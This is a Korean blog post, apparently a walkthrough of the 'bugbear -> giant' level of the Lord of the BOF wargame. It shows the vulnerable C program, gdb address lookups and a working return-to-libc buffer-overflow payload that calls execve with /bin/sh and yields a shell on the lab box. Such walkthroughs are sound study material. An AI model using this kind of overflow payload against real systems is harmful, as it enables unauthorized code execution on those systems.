ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] bugbear -> giant
    공부/LOB 2014. 7. 30. 20:07

    [bugbear@localhost bugbear]$ cat giant.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - giant
            - RTL2
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    main(int argc, char *argv[])
    {
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
            printf("You must use execve!\n");
            exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
    [bugbear@localhost bugbear]$ gdb giant
    (gdb) p execve
    $2 = {<text variable, no debug info>} 0x400a9d48 <__execve>
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
    (gdb) p exit
    $1 = {void (int)} 0x400391e0 <exit>
    (gdb) q
    [bugbear@localhost bugbear]$ ./find
    /bin/sh : 0x400fbff9
    (gdb) x/s 0xbffffff7    //stack끝에 들어가는 execve의 두번쨰 인자로 들어갈
    0xbffffff7:     "廈\017@"
    (gdb)
    ./$"`python -c'print "\xf9\xbf\x0f\x40"'`" "`python -c'print "a"*44+"\x48\x9d\x0a\x40"+"AAAA"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"'`"



    payload = 더미 44byte + execve 주소 4byte(\x48\x9d\x0a\x40) + 더미 4byte (AAAA) + /bin/sh주소 ()
    [bugbear@localhost bugbear]$ ./$"`python -c'print "\xf9\xbf\x0f\x40"'`" "`python -c'print "a"*44+"\x48\x9d\x0a\x40"+"AAAA"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"'`"
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH?
    @AAAA廈@?웠
    bash$ my-pass
    euid = 514
    one step closer

    '공부 > LOB' 카테고리의 다른 글

    [lob] assassin -> zombie_assassin  (0) 2014.07.30
    [lob] giant -> assassin  (0) 2014.07.30
    [lob] bugbear -> giant  (0) 2014.07.30
    [lob] darkknight -> bugbrear  (0) 2014.07.30
    [lob] golem -> darknight  (0) 2014.07.30
    [lob] vampire -> skeleton  (3) 2014.07.30

    댓글 0

Designed by Tistory.